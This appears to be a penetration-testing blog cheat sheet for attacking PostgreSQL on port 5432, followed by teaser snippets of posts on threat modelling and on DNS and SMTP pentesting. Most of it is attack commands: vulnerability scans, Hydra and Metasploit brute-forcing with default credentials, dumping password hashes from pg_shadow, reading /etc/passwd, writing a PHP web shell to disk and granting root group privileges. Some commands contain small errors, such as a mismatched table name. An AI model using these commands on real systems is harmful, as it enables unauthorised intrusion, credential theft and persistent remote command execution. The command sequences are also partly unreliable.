Skip to main content

PostgreSQL - Port 5432

 

PostgreSQL, also known as Postgres, is a powerful open-source object-relational database system. It has earned a strong reputation for its proven architecture, reliability, data integrity, robust feature set, and extensibility.


Identify PostgreSQL


nmap -sV -p 5432 <target-host>

nmap Scanning
nmap -sC -sV --script vuln,vulners --script-args mincvss=7.0 -p5432,5433 -Pn 10.10.10.10 
 #make sure to check for vulnerable versions

nmap -sV -p 5432 <target-host>

Exploiting Known Vulnerabilities

searchsploit postgresql <version>

Enumerating Databases and Tables

List all databases
\l

Switch to a database

\c <database_name>

List tables in the current database:

\dt

Extract data from a specific table:

SELECT * FROM <table_name>;

Dumping Hashes

SELECT usename, passwd FROM pg_shadow;

Accessing File System

COPY (SELECT * FROM sensitive_table) TO '/tmp/sensitive_data.txt';
Bruteforcing Postgres Creds

#Using Metasploit
use auxiliary/scanner/postgres/postgres_login

#using Hydra
hydra -L /usr/share/metasploit-framework/data/wordlists/postgres_default_user.txt -P /usr/share/metasploit-framework/data/wordlists/postgres_default_pass.txt 10.10.10.10 postgres

Default Username & Passwords:
● postgres : postgres
● postgres : password
● postgres : admin
● admin : admin
● admin : password
  root : root

#or for a better wordlist 
cp /usr/share/wordlists/seclists/Passwords/Default-Credentials/postgres-betterdefaultpasslist.txt .
cat postgres-betterdefaultpasslist.txt | cut -f1 -d":" > user.txt
cat postgres-betterdefaultpasslist.txt  | cut -f2 -d":" > pass.txt


Accessing remote Postgresql server

psql -h 10.10.10.10 -U USERNAME
psql -h <host> -U <username> -d <database>
PrivEsc when Postgresql Is Running As Root

psql -h 127.0.0.1 -d DB_NAME -U unixusrmgr  //Enter Password later 

\dt    \\List Tables
\dp     \\Get DB privileges
select * from table_name; \\ Check Home Directory (just in case) 

Example to Update a value in all rows:
update table_name set gid=0 where gid=1001; \Giving Root Privs

or 
insert into passwd_table (username,passwd,gid,homedir) values ('freak','openssl_encrypted password',0,'/');
Reading files via Postgres
use auxiliary/admin/postgres/postgres_readfile

#Downloading a file 
> create table new(file TEXT);
COPY new FROM '/etc/passwd';
select * from hack;

#Uploading a file
create table new(put TEXT);
INSERT INTO new(put) VALUES('<?php @system("$_GET[cmd]");?>');
COPY new(put) TO '/tmp/temp.php';
Dumping Hashes

auxiliary/admin/postgres/postgres_sql
>select usename, passwd from pg_shadow;

auxiliary/scanner/postgres/postgres_hashdump

Labels:

Comments

Post a Comment

Popular posts from this blog

Thread Modelling Cheatsheet: Know Your Weaknesses Before Attackers Do!

Threat Modelling Part - 1 What is Threat Modelling?      Threat modelling is the process of identifying, assessing, and mitigating potential security threats before they happen. It helps teams anticipate how systems can be attacked and build defences proactively , not reactively. Key Concepts Threat: Something (like a hacker or malware) that could exploit a weakness. Vulnerability: A flaw in your system that can be exploited. Risk: The chance that a threat will exploit a vulnerability to cause damage. Analogy : Threat = Burglar Vulnerability = Unlocked door Risk = Getting robbed because the door is open in a bad neighborhood  Threat Modelling Process (High-Level) Define the Scope – What systems/apps are you evaluating? Identify Assets – What needs protection? (e.g. data, services) Identify Threats – Think like an attacker. What could go wrong? Analyze Vulnerabilities – What weaknesses exist? Prioritize Ri...
Post a Comment
Read more

DNS Pentest - Port 53

Recon Banner Grabbing - Identify DNS Server Versions # Use dig to determine DNS server versions dig version.bind CHAOS TXT @DNS # Alternatively, use nmap script to grab the banner nmap --script dns-nsid <DNS_IP> # Alternatively, use telnet to grab the banner nc -nv -u <DNS_IP> 53 DNS Server Discovery # Using dig dig NS <target-domain> # Using nslookup nslookup -type=NS <target-domain> Enumeration Using DNS enum dnsenum --dnsserver <DNS_IP> --enum -p 0 -s 0 -o subdomains.txt -f <WORDLIST> <DOMAIN> Using dig # Query DNS records dig hackviser.com # Query specific type of DNS records (e.g., A record) dig A hackviser.com # Perform a reverse DNS lookup dig -x <IP_ADDRESS> # Query a specific DNS server dig @<DNS_SERVER_IP> hackviser.com Using nslookup # Perform DNS queries nslookup hackviser.com # Query a specific type of DNS record (e.g., MX record) nslookup -type=MX hackviser.com # Query a specific DNS server nslookup ha...
Post a Comment
Read more

SMTP (Simple Mail Transfer Protocol) Pentesting - Port 25

 SMTP (Simple Mail Transfer Protocol) is a communication protocol for electronic mail transmission.it is used for sending e-mail. POP3 or IMAP are used for receiving e-mail. Default ports are 25 (SMTP), 465 (SMTPS), 587 (SMTPS)   Connect We can use Telnet to connect to the remote server. Here is a command using Telnet: telnet example.com 25 Enumeration Identifying a SMTP Server You can use Nmap to check if there's an Telnet server on a target host like this: nmap -p25,465,587 -sV -Pn target.com Additional Nmap commands for enumeration nmap --script smtp-brute -p 25,465,587 "target-ip" nmap --script smtp-commands -p 25,465,587 "target-ip" nmap --script smtp-enum-users -p 25,465,587 "target-ip" nmap --script smtp-ntlm-info --script-args smtp-ntlm-info.domain=example.com -p 25,465,587 "target-ip" nmap --script smtp-vuln-cve2011-1764 -p 25,465,587 "target-ip" nmap --script smtp-* -p 25,465,587 "target-ip" Enumer...
Post a Comment
Read more